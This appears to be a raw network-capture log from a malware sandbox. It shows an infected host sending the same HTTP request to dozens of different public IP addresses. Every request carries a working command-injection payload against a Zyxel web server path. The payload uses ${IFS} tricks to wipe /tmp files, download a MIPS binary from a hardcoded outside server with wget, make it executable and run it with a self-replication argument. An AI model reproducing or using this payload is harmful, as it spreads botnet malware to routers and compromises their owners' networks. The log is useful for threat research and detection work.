                                                Jan 28, 2024 10:16:40.032582045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8120192.168.2.2334118106.114.130.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.032607079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8121192.168.2.2354280135.174.32.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.032663107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8122192.168.2.2338236203.97.0.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.032694101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8123192.168.2.2358596115.28.220.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.032718897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8124192.168.2.2349200222.199.231.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.032744884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8125192.168.2.2348458124.35.10.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.032788038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8126192.168.2.236096287.14.29.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.032815933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8127192.168.2.233848461.157.212.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.032846928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8128192.168.2.233860647.160.10.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.032855988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8129192.168.2.2353134146.53.91.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.032877922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8130192.168.2.2349074179.242.156.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.032902002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8131192.168.2.2349756114.220.11.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.032917976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8132192.168.2.233971854.147.205.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.032953024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8133192.168.2.2342404151.45.18.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.032989025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8134192.168.2.233428218.255.196.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033041000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8135192.168.2.2347930207.148.27.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033045053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8136192.168.2.2341158135.73.71.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033063889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8137192.168.2.235911012.65.36.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033075094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8138192.168.2.235314624.8.249.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033101082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8139192.168.2.2356634103.150.96.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033145905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8140192.168.2.2347948129.14.225.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033171892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8141192.168.2.2357084220.49.103.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033193111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8142192.168.2.2354724132.28.76.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033242941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8143192.168.2.234423434.49.63.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033272982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8144192.168.2.2351346131.116.125.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033296108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8145192.168.2.235496692.145.229.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033327103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8146192.168.2.2349678168.113.107.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033334970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8147192.168.2.23478045.148.237.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033401012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8148192.168.2.2341446131.213.220.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033415079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8149192.168.2.2341240194.161.152.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033435106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8150192.168.2.233941432.145.34.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033482075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8151192.168.2.235110234.224.87.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033497095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8152192.168.2.235162690.154.207.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033520937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8153192.168.2.233377631.138.114.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033561945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8154192.168.2.2349662103.242.248.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033597946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8155192.168.2.234379432.198.53.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033668041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8156192.168.2.235951664.255.222.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033668995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8157192.168.2.233673637.197.221.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033675909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8158192.168.2.2349058201.92.139.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033706903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8159192.168.2.2346716147.149.164.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033740044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8160192.168.2.2355582221.3.67.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033781052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8161192.168.2.2342282125.64.53.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033812046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8162192.168.2.235411817.245.226.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033849955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8163192.168.2.2355764110.247.110.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033881903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8164192.168.2.2341330189.115.190.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033891916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8165192.168.2.2347116136.241.64.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033904076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8166192.168.2.234591288.142.126.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033930063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8167192.168.2.2340582121.142.3.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033957958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8168192.168.2.234402037.199.61.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.033971071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8169192.168.2.236004270.145.7.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034027100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8170192.168.2.2338224179.230.201.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034050941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8171192.168.2.235530046.134.16.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034105062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8172192.168.2.2343576173.89.188.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034135103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8173192.168.2.234493032.4.116.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034147978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8174192.168.2.2340832200.54.183.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034177065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8175192.168.2.2353122191.104.12.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034194946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8176192.168.2.235965247.96.146.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034220934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8177192.168.2.2343624136.159.210.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034230947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8178192.168.2.2360234117.220.123.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034243107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8179192.168.2.236046814.167.99.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034260035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8180192.168.2.234216040.2.25.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034291029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8181192.168.2.2357348144.114.238.4443
                                                TimestampBytes transferredDirectionData
